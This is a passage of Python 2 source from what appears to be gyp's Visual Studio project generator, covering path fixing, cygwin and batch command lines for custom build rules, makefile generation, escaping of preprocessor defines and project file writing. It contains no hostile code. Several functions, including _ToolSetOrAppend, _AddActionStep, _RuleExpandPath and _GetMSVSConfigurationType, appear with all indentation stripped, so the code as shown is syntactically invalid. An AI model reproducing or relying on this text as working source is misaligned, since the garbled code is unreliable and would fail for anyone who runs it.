  normalized, and any trailing backslash is dropped.

  Arguments:
    path: The path to convert, may contain / etc.
  Returns:
    The path with all slashes made into backslashes.
  """
  needs_prefix = (fixpath_prefix and path and not os.path.isabs(path)
                  and path[0] != '$')
  if needs_prefix:
    path = os.path.join(fixpath_prefix, path)
  path = _NormalizedSource(path.replace('/', '\\'))
  if path.endswith('\\'):
    path = path[:-1]
  return path
def _FixPaths(paths):
  """Apply _FixPath to every path in the list, returning a new list."""
  fixed = []
  for p in paths:
    fixed.append(_FixPath(p))
  return fixed
def _ConvertSourcesToFilterHierarchy(sources, prefix=None, excluded=None,
                                     list_excluded=True, msvs_version=None):
  """Converts a list split source file paths into a vcproj folder hierarchy.
  Arguments:
    sources: A list of source file paths split.
    prefix: A list of source file path layers meant to apply to each of sources.
    excluded: A set of excluded files.
    list_excluded: If True, excluded files are grouped into a
        '_excluded_files' filter folder.
    msvs_version: A MSVSVersion object.
  Returns:
    A hierarchy of filenames and MSVSProject.Filter objects that matches the
    layout of the source tree.
    For example:
    _ConvertSourcesToFilterHierarchy([['a', 'bob1.c'], ['b', 'bob2.c']],
                                     prefix=['joe'])
    -->
    [MSVSProject.Filter('a', contents=['joe\\a\\bob1.c']),
     MSVSProject.Filter('b', contents=['joe\\b\\bob2.c'])]
  """
  if not prefix: prefix = []
  result = []
  excluded_result = []
  folders = OrderedDict()
  # Gather files into the final result, excluded, or folders.
  for s in sources:
    if len(s) == 1:
      # Leaf: a file directly at this level; join the prefix layers with
      # backslashes to form the vcproj-style path.
      filename = _NormalizedSource('\\'.join(prefix + s))
      # NOTE(review): 'excluded' is assumed to be a set here; the None
      # default would raise TypeError — callers always supply it.
      if filename in excluded:
        excluded_result.append(filename)
      else:
        result.append(filename)
    elif msvs_version and not msvs_version.UsesVcxproj():
      # For MSVS 2008 and earlier, we need to process all files before walking
      # the sub folders.
      if not folders.get(s[0]):
        folders[s[0]] = []
      folders[s[0]].append(s[1:])
    else:
      # MSBuild path: recurse immediately, one filter per directory layer.
      contents = _ConvertSourcesToFilterHierarchy([s[1:]], prefix + [s[0]],
                                               excluded=excluded,
                                               list_excluded=list_excluded,
                                               msvs_version=msvs_version)
      contents = MSVSProject.Filter(s[0], contents=contents)
      result.append(contents)
  # Add a folder for excluded files.
  if excluded_result and list_excluded:
    excluded_folder = MSVSProject.Filter('_excluded_files',
                                         contents=excluded_result)
    result.append(excluded_folder)
  if msvs_version and msvs_version.UsesVcxproj():
    return result
  # Populate all the folders (deferred recursion for MSVS 2008 and earlier).
  for f in folders:
    contents = _ConvertSourcesToFilterHierarchy(folders[f], prefix=prefix + [f],
                                                excluded=excluded,
                                                list_excluded=list_excluded)
    contents = MSVSProject.Filter(f, contents=contents)
    result.append(contents)
  return result
def _ToolAppend(tools, tool_name, setting, value, only_if_unset=False):
  """Append value to a tool setting, silently ignoring empty values."""
  if value:
    _ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset)
def _ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset=False):
# TODO(bradnelson): ugly hack, fix this more generally!!!
if 'Directories' in setting or 'Dependencies' in setting:
if type(value) == str:
value = value.replace('/', '\\')
else:
value = [i.replace('/', '\\') for i in value]
if not tools.get(tool_name):
tools[tool_name] = dict()
tool = tools[tool_name]
if tool.get(setting):
if only_if_unset: return
if type(tool[setting]) == list and type(value) == list:
tool[setting] += value
else:
raise TypeError(
'Appending "%s" to a non-list setting "%s" for tool "%s" is '
'not allowed, previous value: %s' % (
value, setting, tool_name, str(tool[setting])))
else:
tool[setting] = value
def _ConfigPlatform(config_data):
return config_data.get('msvs_configuration_platform', 'Win32')
def _ConfigBaseName(config_name, platform_name):
if config_name.endswith('_' + platform_name):
return config_name[0:-len(platform_name) - 1]
else:
return config_name
def _ConfigFullName(config_name, config_data):
  """Return the MSVS 'Name|Platform' string for a configuration."""
  platform = _ConfigPlatform(config_data)
  base = _ConfigBaseName(config_name, platform)
  return '%s|%s' % (base, platform)
def _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell, has_input_path,
                                quote_cmd, do_setup_env):
  """Builds a single .bat-compatible command string for a rule or action.

  Arguments:
    spec: the project dict (read for 'msvs_cygwin_dirs').
    cmd: the command as a list of arguments.
    cygwin_shell: if true, wrap the command to run under cygwin's bash.
    has_input_path: whether $(InputPath) may appear in the command.
    quote_cmd: whether to quote each argument (non-cygwin branch only).
    do_setup_env: whether to call setup_env.bat first (cygwin branch only).
  Returns:
    The command line string, possibly preceded by INPUTDIR setup lines.
  """
  # $(InputDir) expands with the project dir prefix and a trailing slash;
  # this preamble strips both so %INPUTDIR% is a clean relative directory.
  if [x for x in cmd if '$(InputDir)' in x]:
    input_dir_preamble = (
      'set INPUTDIR=$(InputDir)\n'
      'set INPUTDIR=%INPUTDIR:$(ProjectDir)=%\n'
      'set INPUTDIR=%INPUTDIR:~0,-1%\n'
      )
  else:
    input_dir_preamble = ''

  if cygwin_shell:
    # Find path to cygwin.
    cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
    # Prepare command.
    # Each MSVS macro is rewritten to a backtick cygpath invocation so the
    # value is converted to a cygwin path at run time, inside bash.
    direct_cmd = cmd
    direct_cmd = [i.replace('$(IntDir)',
                            '`cygpath -m "${INTDIR}"`') for i in direct_cmd]
    direct_cmd = [i.replace('$(OutDir)',
                            '`cygpath -m "${OUTDIR}"`') for i in direct_cmd]
    direct_cmd = [i.replace('$(InputDir)',
                            '`cygpath -m "${INPUTDIR}"`') for i in direct_cmd]
    if has_input_path:
      direct_cmd = [i.replace('$(InputPath)',
                              '`cygpath -m "${INPUTPATH}"`')
                    for i in direct_cmd]
    # Quote each argument for the `bash -c "..."` wrapper: embedded quotes
    # become \\\" so they survive both the .bat and bash parsing layers.
    direct_cmd = ['\\"%s\\"' % i.replace('"', '\\\\\\"') for i in direct_cmd]
    # direct_cmd = gyp.common.EncodePOSIXShellList(direct_cmd)
    direct_cmd = ' '.join(direct_cmd)
    # TODO(quote): regularize quoting path names throughout the module
    cmd = ''
    if do_setup_env:
      cmd += 'call "$(ProjectDir)%(cygwin_dir)s\\setup_env.bat" && '
    cmd += 'set CYGWIN=nontsec&& '
    # Only export the environment variables the command actually references.
    if direct_cmd.find('NUMBER_OF_PROCESSORS') >= 0:
      cmd += 'set /a NUMBER_OF_PROCESSORS_PLUS_1=%%NUMBER_OF_PROCESSORS%%+1&& '
    if direct_cmd.find('INTDIR') >= 0:
      cmd += 'set INTDIR=$(IntDir)&& '
    if direct_cmd.find('OUTDIR') >= 0:
      cmd += 'set OUTDIR=$(OutDir)&& '
    if has_input_path and direct_cmd.find('INPUTPATH') >= 0:
      cmd += 'set INPUTPATH=$(InputPath) && '
    cmd += 'bash -c "%(cmd)s"'
    cmd = cmd % {'cygwin_dir': cygwin_dir,
                 'cmd': direct_cmd}
    return input_dir_preamble + cmd
  else:
    # Convert cat --> type to mimic unix.
    if cmd[0] == 'cat':
      command = ['type']
    else:
      command = [cmd[0].replace('/', '\\')]
    # Add call before command to ensure that commands can be tied together one
    # after the other without aborting in Incredibuild, since IB makes a bat
    # file out of the raw command string, and some commands (like python) are
    # actually batch files themselves.
    command.insert(0, 'call')
    # Fix the paths
    # TODO(quote): This is a really ugly heuristic, and will miss path fixing
    # for arguments like "--arg=path" or "/opt:path".
    # If the argument starts with a slash or dash, it's probably a command line
    # switch
    arguments = [i if (i[:1] in "/-") else _FixPath(i) for i in cmd[1:]]
    arguments = [i.replace('$(InputDir)', '%INPUTDIR%') for i in arguments]
    arguments = [MSVSSettings.FixVCMacroSlashes(i) for i in arguments]
    if quote_cmd:
      # Support a mode for using cmd directly.
      # Convert any paths to native form (first element is used directly).
      # TODO(quote): regularize quoting path names throughout the module
      arguments = ['"%s"' % i for i in arguments]
    # Collapse into a single command.
    return input_dir_preamble + ' '.join(command + arguments)
def _BuildCommandLineForRule(spec, rule, has_input_path, do_setup_env):
  """Builds the command line for a rule, resolving cygwin/quote settings.

  The rule's own 'msvs_cygwin_shell' wins; otherwise the spec-level setting
  (default 1) applies.
  """
  # Currently this weird argument munging is used to duplicate the way a
  # python script would need to be run as part of the chrome tree.
  # Eventually we should add some sort of rule_default option to set this
  # per project. For now the behavior chrome needs is the default.
  cygwin_shell = rule.get('msvs_cygwin_shell')
  if cygwin_shell is None:
    cygwin_shell = int(spec.get('msvs_cygwin_shell', 1))
  elif isinstance(cygwin_shell, str):
    cygwin_shell = int(cygwin_shell)
  quote_cmd = int(rule.get('msvs_quote_cmd', 1))
  return _BuildCommandLineForRuleRaw(spec, rule['action'], cygwin_shell,
                                     has_input_path, quote_cmd,
                                     do_setup_env=do_setup_env)
def _AddActionStep(actions_dict, inputs, outputs, description, command):
"""Merge action into an existing list of actions.
Care must be taken so that actions which have overlapping inputs either don't
get assigned to the same input, or get collapsed into one.
Arguments:
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
inputs: list of inputs
outputs: list of outputs
description: description of the action
command: command line to execute
"""
# Require there to be at least one input (call sites will ensure this).
assert inputs
action = {
'inputs': inputs,
'outputs': outputs,
'description': description,
'command': command,
}
# Pick where to stick this action.
# While less than optimal in terms of build time, attach them to the first
# input for now.
chosen_input = inputs[0]
# Add it there.
if chosen_input not in actions_dict:
actions_dict[chosen_input] = []
actions_dict[chosen_input].append(action)
def _AddCustomBuildToolForMSVS(p, spec, primary_input,
                               inputs, outputs, description, cmd):
  """Add a custom build tool to execute something.
  Arguments:
    p: the target project
    spec: the target project dict
    primary_input: input file to attach the build tool to
    inputs: list of inputs
    outputs: list of outputs
    description: description of the action
    cmd: command line to execute
  """
  inputs = _FixPaths(inputs)
  outputs = _FixPaths(outputs)
  tool = MSVSProject.Tool(
      'VCCustomBuildTool',
      {'Description': description,
       'AdditionalDependencies': ';'.join(inputs),
       'Outputs': ';'.join(outputs),
       'CommandLine': cmd,
      })
  # Add to the properties of primary input for each config.
  # NOTE(review): dict.iteritems is Python 2 only; this file targets
  # Python 2 throughout.
  for config_name, c_data in spec['configurations'].iteritems():
    p.AddFileConfig(_FixPath(primary_input),
                    _ConfigFullName(config_name, c_data), tools=[tool])
def _AddAccumulatedActionsToMSVS(p, spec, actions_dict):
  """Add actions accumulated into an actions_dict, merging as needed.
  Arguments:
    p: the target project
    spec: the target project dict
    actions_dict: dictionary keyed on input name, which maps to a list of
        dicts describing the actions attached to that input file.
  """
  for primary_input in actions_dict:
    # Merge every action attached to this input into one custom build step:
    # union the inputs/outputs, join descriptions, and chain the commands.
    inputs = OrderedSet()
    outputs = OrderedSet()
    descriptions = []
    commands = []
    for action in actions_dict[primary_input]:
      inputs.update(OrderedSet(action['inputs']))
      outputs.update(OrderedSet(action['outputs']))
      descriptions.append(action['description'])
      commands.append(action['command'])
    # Add the custom build step for one input file.
    description = ', and also '.join(descriptions)
    # CRLF-join so the .bat that MSVS generates runs the commands in sequence.
    command = '\r\n'.join(commands)
    _AddCustomBuildToolForMSVS(p, spec,
                               primary_input=primary_input,
                               inputs=inputs,
                               outputs=outputs,
                               description=description,
                               cmd=command)
def _RuleExpandPath(path, input_file):
"""Given the input file to which a rule applied, string substitute a path.
Arguments:
path: a path to string expand
input_file: the file to which the rule applied.
Returns:
The string substituted path.
"""
path = path.replace('$(InputName)',
os.path.splitext(os.path.split(input_file)[1])[0])
path = path.replace('$(InputDir)', os.path.dirname(input_file))
path = path.replace('$(InputExt)',
os.path.splitext(os.path.split(input_file)[1])[1])
path = path.replace('$(InputFileName)', os.path.split(input_file)[1])
path = path.replace('$(InputPath)', input_file)
return path
def _FindRuleTriggerFiles(rule, sources):
  """Find the list of files which a particular rule applies to.
  Arguments:
    rule: the rule in question
    sources: the set of all known source files for this project (currently
        unused; trigger files are taken verbatim from rule['rule_sources'])
  Returns:
    The list of sources that trigger a particular rule.
  """
  return rule.get('rule_sources', [])
def _RuleInputsAndOutputs(rule, trigger_file):
  """Find the inputs and outputs generated by a rule.

  Arguments:
    rule: the rule in question.
    trigger_file: the main trigger for this rule.
  Returns:
    The pair of (inputs, outputs) involved in this rule; the trigger file is
    always included in the inputs.
  """
  inputs = OrderedSet()
  outputs = OrderedSet()
  inputs.add(trigger_file)
  # Expand the $(Input*) macros against the trigger file for each raw path.
  for path in _FixPaths(rule.get('inputs', [])):
    inputs.add(_RuleExpandPath(path, trigger_file))
  for path in _FixPaths(rule.get('outputs', [])):
    outputs.add(_RuleExpandPath(path, trigger_file))
  return (inputs, outputs)
def _GenerateNativeRulesForMSVS(p, rules, output_dir, spec, options):
  """Generate a native rules file.
  Arguments:
    p: the target project
    rules: the set of rules to include
    output_dir: the directory in which the project/gyp resides
    spec: the project dict
    options: global generator options
  """
  rules_filename = '%s%s.rules' % (spec['target_name'],
                                   options.suffix)
  rules_file = MSVSToolFile.Writer(os.path.join(output_dir, rules_filename),
                                   spec['target_name'])
  # Add each rule.
  for r in rules:
    rule_name = r['rule_name']
    rule_ext = r['extension']
    inputs = _FixPaths(r.get('inputs', []))
    outputs = _FixPaths(r.get('outputs', []))
    # Skip a rule with no action and no inputs.
    # NOTE(review): inputs/outputs above are computed even for skipped rules;
    # harmless since _FixPaths has no side effects.
    if 'action' not in r and not r.get('rule_sources', []):
      continue
    cmd = _BuildCommandLineForRule(spec, r, has_input_path=True,
                                   do_setup_env=True)
    rules_file.AddCustomBuildRule(name=rule_name,
                                  description=r.get('message', rule_name),
                                  extensions=[rule_ext],
                                  additional_dependencies=inputs,
                                  outputs=outputs,
                                  cmd=cmd)
  # Write out rules file.
  rules_file.WriteIfChanged()
  # Add rules file to project.
  p.AddToolFile(rules_filename)
def _Cygwinify(path):
path = path.replace('$(OutDir)', '$(OutDirCygwin)')
path = path.replace('$(IntDir)', '$(IntDirCygwin)')
return path
def _GenerateExternalRules(rules, output_dir, spec,
                           sources, options, actions_to_add):
  """Generate an external makefile to do a set of rules.
  Arguments:
    rules: the list of rules to include
    output_dir: path containing project and gyp files
    spec: project specification data
    sources: set of sources known
    options: global generator options
    actions_to_add: The list of actions we will add to.
  """
  filename = '%s_rules%s.mk' % (spec['target_name'], options.suffix)
  mk_file = gyp.common.WriteOnDiff(os.path.join(output_dir, filename))
  # Find cygwin style versions of some paths.
  mk_file.write('OutDirCygwin:=$(shell cygpath -u "$(OutDir)")\n')
  mk_file.write('IntDirCygwin:=$(shell cygpath -u "$(IntDir)")\n')
  # Gather stuff needed to emit all: target.
  all_inputs = OrderedSet()
  all_outputs = OrderedSet()
  all_output_dirs = OrderedSet()
  first_outputs = []
  for rule in rules:
    trigger_files = _FindRuleTriggerFiles(rule, sources)
    for tf in trigger_files:
      inputs, outputs = _RuleInputsAndOutputs(rule, tf)
      all_inputs.update(OrderedSet(inputs))
      all_outputs.update(OrderedSet(outputs))
      # Only use one target from each rule as the dependency for
      # 'all' so we don't try to build each rule multiple times.
      first_outputs.append(list(outputs)[0])
      # Get the unique output directories for this rule.
      output_dirs = [os.path.split(i)[0] for i in outputs]
      for od in output_dirs:
        all_output_dirs.add(od)
  first_outputs_cyg = [_Cygwinify(i) for i in first_outputs]
  # Write out all: target, including mkdir for each output directory.
  mk_file.write('all: %s\n' % ' '.join(first_outputs_cyg))
  for od in all_output_dirs:
    if od:
      mk_file.write('\tmkdir -p `cygpath -u "%s"`\n' % od)
  mk_file.write('\n')
  # Define how each output is generated.
  for rule in rules:
    trigger_files = _FindRuleTriggerFiles(rule, sources)
    for tf in trigger_files:
      # Get all the inputs and outputs for this rule for this trigger file.
      inputs, outputs = _RuleInputsAndOutputs(rule, tf)
      inputs = [_Cygwinify(i) for i in inputs]
      outputs = [_Cygwinify(i) for i in outputs]
      # Prepare the command line for this rule.
      cmd = [_RuleExpandPath(c, tf) for c in rule['action']]
      cmd = ['"%s"' % i for i in cmd]
      cmd = ' '.join(cmd)
      # Add it to the makefile.
      mk_file.write('%s: %s\n' % (' '.join(outputs), ' '.join(inputs)))
      mk_file.write('\t%s\n\n' % cmd)
  # Close up the file.
  mk_file.close()
  # Add makefile to list of sources.
  sources.add(filename)
  # Add a build action to call makefile.
  # The makefile is run under cygwin (cygwin_shell=True below).
  cmd = ['make',
         'OutDir=$(OutDir)',
         'IntDir=$(IntDir)',
         '-j', '${NUMBER_OF_PROCESSORS_PLUS_1}',
         '-f', filename]
  cmd = _BuildCommandLineForRuleRaw(spec, cmd, True, False, True, True)
  # Insert makefile as 0'th input, so it gets the action attached there,
  # as this is easier to understand from in the IDE.
  all_inputs = list(all_inputs)
  all_inputs.insert(0, filename)
  _AddActionStep(actions_to_add,
                 inputs=_FixPaths(all_inputs),
                 outputs=_FixPaths(all_outputs),
                 description='Running external rules for %s' %
                     spec['target_name'],
                 command=cmd)
def _EscapeEnvironmentVariableExpansion(s):
"""Escapes % characters.
Escapes any % characters so that Windows-style environment variable
expansions will leave them alone.
See http://connect.microsoft.com/VisualStudio/feedback/details/106127/cl-d-name-text-containing-percentage-characters-doesnt-compile
to understand why we have to do this.
Args:
s: The string to be escaped.
Returns:
The escaped string.
"""
s = s.replace('%', '%%')
return s
quote_replacer_regex = re.compile(r'(\\*)"')
def _EscapeCommandLineArgumentForMSVS(s):
  """Escapes a Windows command-line argument.

  So that the Win32 CommandLineToArgv function will turn the escaped result
  back into the original string.
  See http://msdn.microsoft.com/en-us/library/17w5ykft.aspx
  ("Parsing C++ Command-Line Arguments") to understand why we have to do
  this.

  Args:
    s: the string to be escaped.
  Returns:
    the escaped string.
  """
  def _Replace(match):
    # CommandLineToArgv wants an odd number of backslashes before a literal
    # quote, producing half as many literal backslashes (rounded down): so
    # n leading backslashes become 2n, followed by \".
    return 2 * match.group(1) + '\\"'
  # Escape all quotes so that they are interpreted literally.
  escaped = quote_replacer_regex.sub(_Replace, s)
  # Surround with unescaped quotes so embedded whitespace survives.
  return '"' + escaped + '"'
delimiters_replacer_regex = re.compile(r'(\\*)([,;]+)')
def _EscapeVCProjCommandLineArgListItem(s):
  """Escapes command line arguments for MSVS.
  The VCProj format stores string lists in a single string using commas and
  semi-colons as separators, which must be quoted if they are to be
  interpreted literally. However, command-line arguments may already have
  quotes, and the VCProj parser is ignorant of the backslash escaping
  convention used by CommandLineToArgv, so the command-line quotes and the
  VCProj quotes may not be the same quotes. So to store a general
  command-line argument in a VCProj list, we need to parse the existing
  quoting according to VCProj's convention and quote any delimiters that are
  not already quoted by that convention. The quotes that we add will also be
  seen by CommandLineToArgv, so if backslashes precede them then we also have
  to escape those backslashes according to the CommandLineToArgv
  convention.
  Args:
    s: the string to be escaped.
  Returns:
    the escaped string.
  """
  def _Replace(match):
    # For a non-literal quote, CommandLineToArgv requires an even number of
    # backslashes preceding it, and it produces half as many literal
    # backslashes. So we need to produce 2n backslashes.
    return 2 * match.group(1) + '"' + match.group(2) + '"'

  # Splitting on '"' alternates unquoted/quoted segments; delimiters only
  # need quoting inside the unquoted (even-indexed) segments.
  segments = s.split('"')
  # The unquoted segments are at the even-numbered indices.
  for i in range(0, len(segments), 2):
    segments[i] = delimiters_replacer_regex.sub(_Replace, segments[i])
  # Concatenate back into a single string
  s = '"'.join(segments)
  if len(segments) % 2 == 0:
    # String ends while still quoted according to VCProj's convention. This
    # means the delimiter and the next list item that follow this one in the
    # .vcproj file will be misinterpreted as part of this item. There is nothing
    # we can do about this. Adding an extra quote would correct the problem in
    # the VCProj but cause the same problem on the final command-line. Moving
    # the item to the end of the list does works, but that's only possible if
    # there's only one such item. Let's just warn the user.
    print >> sys.stderr, ('Warning: MSVS may misinterpret the odd number of ' +
                          'quotes in ' + s)
  return s
def _EscapeCppDefineForMSVS(s):
  """Escapes a CPP define so that it will reach the compiler unaltered."""
  # Apply the three escaping layers in order: %-expansion, CommandLineToArgv
  # quoting, then VCProj list-delimiter quoting.
  for escape in (_EscapeEnvironmentVariableExpansion,
                 _EscapeCommandLineArgumentForMSVS,
                 _EscapeVCProjCommandLineArgListItem):
    s = escape(s)
  # cl.exe replaces literal # characters with = in preprocessor definitions
  # for some reason. Octal-encode to work around that.
  return s.replace('#', '\\%03o' % ord('#'))
quote_replacer_regex2 = re.compile(r'(\\+)"')
def _EscapeCommandLineArgumentForMSBuild(s):
  """Escapes a Windows command-line argument for use by MSBuild."""
  def _Replace(match):
    # n leading backslashes become 2n (floor(n/2)*4 covers the n consumed by
    # the match), followed by an escaped quote. Floor division (//) is used:
    # it is identical to / for ints on Python 2 but avoids producing a float
    # multiplier (a TypeError for str * float) under Python 3 semantics.
    return (len(match.group(1)) // 2 * 4) * '\\' + '\\"'
  # Escape all quotes so that they are interpreted literally.
  s = quote_replacer_regex2.sub(_Replace, s)
  return s
def _EscapeMSBuildSpecialCharacters(s):
escape_dictionary = {
'%': '%25',
'$': '%24',
'@': '%40',
"'": '%27',
';': '%3B',
'?': '%3F',
'*': '%2A'
}
result = ''.join([escape_dictionary.get(c, c) for c in s])
return result
def _EscapeCppDefineForMSBuild(s):
  """Escapes a CPP define so that it will reach the compiler unaltered."""
  # Layered escaping: %-expansion, MSBuild argument quoting, then MSBuild
  # special-character percent-encoding.
  for escape in (_EscapeEnvironmentVariableExpansion,
                 _EscapeCommandLineArgumentForMSBuild,
                 _EscapeMSBuildSpecialCharacters):
    s = escape(s)
  # cl.exe replaces literal # characters with = in preprocessor definitions
  # for some reason. Octal-encode to work around that.
  return s.replace('#', '\\%03o' % ord('#'))
def _GenerateRulesForMSVS(p, output_dir, options, spec,
                          sources, excluded_sources,
                          actions_to_add):
  """Generate all the rules for a particular project.
  Arguments:
    p: the project
    output_dir: directory to emit rules to
    options: global options passed to the generator
    spec: the specification for this project
    sources: the set of all known source files in this project
    excluded_sources: the set of sources excluded from normal processing
    actions_to_add: deferred list of actions to add in
  """
  rules = spec.get('rules', [])
  # Partition rules by 'msvs_external_rule': native rules go into a .rules
  # file; external rules are driven through a generated makefile.
  rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
  rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]

  # Handle rules that use a native rules file.
  if rules_native:
    _GenerateNativeRulesForMSVS(p, rules_native, output_dir, spec, options)

  # Handle external rules (non-native rules).
  if rules_external:
    _GenerateExternalRules(rules_external, output_dir, spec,
                           sources, options, actions_to_add)
  # Both rule flavors may add generated outputs back into the source lists.
  _AdjustSourcesForRules(spec, rules, sources, excluded_sources)
def _AdjustSourcesForRules(spec, rules, sources, excluded_sources):
  """Adds rule-generated outputs (and extra inputs) to the source sets.

  Mutates 'sources' and 'excluded_sources' in place.
  """
  # Add outputs generated by each rule (if applicable).
  for rule in rules:
    # Only rules marked 'process_outputs_as_sources' contribute here.
    if int(rule.get('process_outputs_as_sources', False)):
      # Add in the outputs from this rule.
      trigger_files = _FindRuleTriggerFiles(rule, sources)
      for trigger_file in trigger_files:
        inputs, outputs = _RuleInputsAndOutputs(rule, trigger_file)
        inputs = OrderedSet(_FixPaths(inputs))
        outputs = OrderedSet(_FixPaths(outputs))
        # The trigger file itself is already a source; don't re-add it.
        inputs.remove(_FixPath(trigger_file))
        sources.update(inputs)
        if not spec.get('msvs_external_builder'):
          # Extra rule inputs are listed but not built directly.
          excluded_sources.update(inputs)
        sources.update(outputs)
def _FilterActionsFromExcluded(excluded_sources, actions_to_add):
  """Take inputs with actions attached out of the list of exclusions.

  Arguments:
    excluded_sources: list of source files not to be built.
    actions_to_add: dict of actions keyed on source file they're attached to.
  Returns:
    excluded_sources with files that have actions attached removed.
  """
  must_keep = OrderedSet(_FixPaths(actions_to_add.keys()))
  return [source for source in excluded_sources if source not in must_keep]
def _GetDefaultConfiguration(spec):
return spec['configurations'][spec['default_configuration']]
def _GetGuidOfProject(proj_path, spec):
  """Get the guid for the project.

  Arguments:
    proj_path: Path of the vcproj or vcxproj file to generate.
    spec: The target dictionary containing the properties of the target.
  Returns:
    the guid.
  Raises:
    ValueError: if the specified GUID is invalid.
  """
  # Pluck out the default configuration.
  default_config = _GetDefaultConfiguration(spec)
  # A user-specified guid takes precedence; otherwise derive one from the
  # project path so it is stable across regenerations.
  guid = default_config.get('msvs_guid')
  if guid:
    if VALID_MSVS_GUID_CHARS.match(guid) is None:
      raise ValueError('Invalid MSVS guid: "%s". Must match regex: "%s".' %
                       (guid, VALID_MSVS_GUID_CHARS.pattern))
    guid = '{%s}' % guid
  return guid or MSVSNew.MakeGuid(proj_path)
def _GetMsbuildToolsetOfProject(proj_path, spec, version):
  """Get the platform toolset for the project.

  Arguments:
    proj_path: Path of the vcproj or vcxproj file to generate.
    spec: The target dictionary containing the properties of the target.
    version: The MSVSVersion object.
  Returns:
    the platform toolset string or None.
  """
  # Pluck out the default configuration.
  default_config = _GetDefaultConfiguration(spec)
  toolset = default_config.get('msbuild_toolset')
  if not toolset:
    # Fall back to the version's default toolset, if it has one.
    default_toolset = version.DefaultToolset()
    if default_toolset:
      toolset = default_toolset
  return toolset
def _GenerateProject(project, options, version, generator_flags):
  """Generates a vcproj file.

  Arguments:
    project: the MSVSProject object.
    options: global generator options.
    version: the MSVSVersion object.
    generator_flags: dict of generator-specific flags.
  Returns:
    A list of source files that cannot be found on disk.
  """
  default_config = _GetDefaultConfiguration(project.spec)

  # Skip emitting anything if told to with msvs_existing_vcproj option.
  if default_config.get('msvs_existing_vcproj'):
    return []

  # .vcxproj (MSBuild) and .vcproj (classic MSVS) use separate writers.
  generate = (_GenerateMSBuildProject if version.UsesVcxproj()
              else _GenerateMSVSProject)
  return generate(project, options, version, generator_flags)
def _GenerateMSVSProject(project, options, version, generator_flags):
  """Generates a .vcproj file.  It may create .rules and .user files too.
  Arguments:
    project: The project object we will generate the file for.
    options: Global options passed to the generator.
    version: The VisualStudioVersion object.
    generator_flags: dict of generator-specific flags.
  Returns:
    A list of source files that cannot be found on disk (missing_sources).
  """
  spec = project.spec
  gyp.common.EnsureDirExists(project.path)

  platforms = _GetUniquePlatforms(spec)
  p = MSVSProject.Writer(project.path, version, spec['target_name'],
                         project.guid, platforms)

  # Get directory project file is in.
  project_dir = os.path.split(project.path)[0]
  gyp_path = _NormalizedSource(project.build_file)
  relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)

  config_type = _GetMSVSConfigurationType(spec, project.build_file)
  for config_name, config in spec['configurations'].iteritems():
    _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config)

  # Prepare list of sources and excluded sources.
  gyp_file = os.path.split(project.build_file)[1]
  sources, excluded_sources = _PrepareListOfSources(spec, generator_flags,
                                                    gyp_file)

  # Add rules.
  actions_to_add = {}
  _GenerateRulesForMSVS(p, project_dir, options, spec,
                        sources, excluded_sources,
                        actions_to_add)
  list_excluded = generator_flags.get('msvs_list_excluded_files', True)
  sources, excluded_sources, excluded_idl = (
      _AdjustSourcesAndConvertToFilterHierarchy(spec, options, project_dir,
                                                sources, excluded_sources,
                                                list_excluded, version))

  # Add in files.
  missing_sources = _VerifySourcesExist(sources, project_dir)
  p.AddFiles(sources)

  _AddToolFilesToMSVS(p, spec)
  _HandlePreCompiledHeaders(p, sources, spec)
  _AddActions(actions_to_add, spec, relative_path_of_gyp_file)
  _AddCopies(actions_to_add, spec)
  _WriteMSVSUserFile(project.path, version, spec)

  # NOTE: this stanza must appear after all actions have been decided.
  # Don't excluded sources with actions attached, or they won't run.
  excluded_sources = _FilterActionsFromExcluded(
      excluded_sources, actions_to_add)
  _ExcludeFilesFromBeingBuilt(p, spec, excluded_sources, excluded_idl,
                              list_excluded)
  _AddAccumulatedActionsToMSVS(p, spec, actions_to_add)

  # Write it out.
  p.WriteIfChanged()

  return missing_sources
def _GetUniquePlatforms(spec):
  """Returns the list of unique platforms for this spec, e.g ['win32', ...].
  Arguments:
    spec: The target dictionary containing the properties of the target.
  Returns:
    The list of unique platform name strings, in first-seen order.
  """
  # Gather list of unique platforms.
  platforms = OrderedSet()
  for configuration in spec['configurations']:
    platforms.add(_ConfigPlatform(spec['configurations'][configuration]))
  platforms = list(platforms)
  return platforms
def _CreateMSVSUserFile(proj_path, version, spec):
  """Generates a .user file for the user running this Gyp program.
  Arguments:
    proj_path: The path of the project file being created.  The .user file
               shares the same path (with an appropriate suffix).
    version: The VisualStudioVersion object.
    spec: The target dictionary containing the properties of the target.
  Returns:
    The MSVSUserFile object created.
  """
  # The filename embeds domain and username so per-user settings don't
  # collide when several users share a checkout.
  (domain, username) = _GetDomainAndUserName()
  vcuser_filename = '.'.join([proj_path, domain, username, 'user'])
  user_file = MSVSUserFile.Writer(vcuser_filename, version,
                                  spec['target_name'])
  return user_file
def _GetMSVSConfigurationType(spec, build_file):
"""Returns the configuration type for this project.
It's a number defined by Microsoft. May raise an exception.
Args:
spec: The target dictionary containing the properties of the target.
build_file: The path of the gyp file.
Returns:
An integer, the configuration type.
"""
try:
config_type = {
'executable': '1', # .exe
'shared_library': '2', # .dll
'loadable_module': '2', # .dll
'static_library': '4', # .lib
'none': '10', # Utility type
}[spec['type']]
except KeyError:
if spec.get('type'):
raise GypError('Target type %s is not a valid target type for '
'target %s in %s.' %
(spec['type'], spec['target_name'], build_file))
else:
raise GypError('Missing type field for target %s in %s.' %
(spec['target_name'], build_file))
return config_type
def _AddConfigurationToMSVSProject(p, spec, config_type, config_name, config):
  """Adds a configuration to the MSVS project.
  Many settings in a vcproj file are specific to a configuration.  This
  function the main part of the vcproj file that's configuration specific.
  Arguments:
    p: The target project being generated.
    spec: The target dictionary containing the properties of the target.
    config_type: The configuration type, a number as defined by Microsoft.
    config_name: The name of the configuration.
    config: The dictionary that defines the special processing to be done
            for this configuration.
  """
  # Get the information for this configuration
  include_dirs, resource_include_dirs = _GetIncludeDirs(config)
  libraries = _GetLibraries(spec)
  library_dirs = _GetLibraryDirs(config)
  out_file, vc_tool, _ = _GetOutputFilePathAndTool(spec, msbuild=False)
  defines = _GetDefines(config)
